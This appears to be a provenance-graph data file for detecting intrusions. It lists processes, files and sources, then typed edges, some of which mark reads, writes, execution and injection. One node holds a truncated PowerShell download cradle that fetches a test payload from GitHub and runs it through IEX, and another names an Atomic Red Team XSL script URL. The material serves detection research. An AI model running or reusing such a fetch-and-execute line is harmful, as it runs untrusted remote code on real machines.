16
MP*-damianocrnofj6793.exe
MP*-notepad++.exe
MP*-3e5096359da3ff9944a9b85da8a000648c32e77d898b8966b242a332d8b30b1e.exe 
MF-\deerbrook.ppt
MP-wmpnscfg.exe
TP-vbc.exe
MF-\Users\admin\AppData\Local\Temp\tmp190.tmp
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-C:\Users\admin\AppData\Local\84ef6d24-ce7f-44e4-a5ae-1d47d92bf287\build2.exe
MP-csc.exe
SF-%tmp%\v
TP-timeout.exe
MP*-secedit.exe
MP-wmpnscfg.exe
MF-C:\Users\admin\AppData\Local\Temp\7f7be37fceeccdf8a8869b6371ba11a6628d64790b416ba4e2a3aebbb38a2132
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
37
0 1 FR
0 2 FR
0 3 RD
1 3 EX
2 3 RD
0 4 UK
1 5 FR
2 5 IJ
5 3 RD
1 6 WR
2 6 WR
5 6 WR
7 1 RF
7 2 RF
5 7 ST
1 8 EX
2 8 WR
5 8 CD
1 9 UK
2 10 RD
5 10 WR
2 11 UK
12 3 WR
5 12 IJ
12 6 RD
7 12 RF
12 8 RD
12 10 WR
13 3 RD
5 13 IJ
13 6 RD
13 7 ST
13 8 RD
13 10 WR
12 13 UK
5 14 RD
15 5 RF

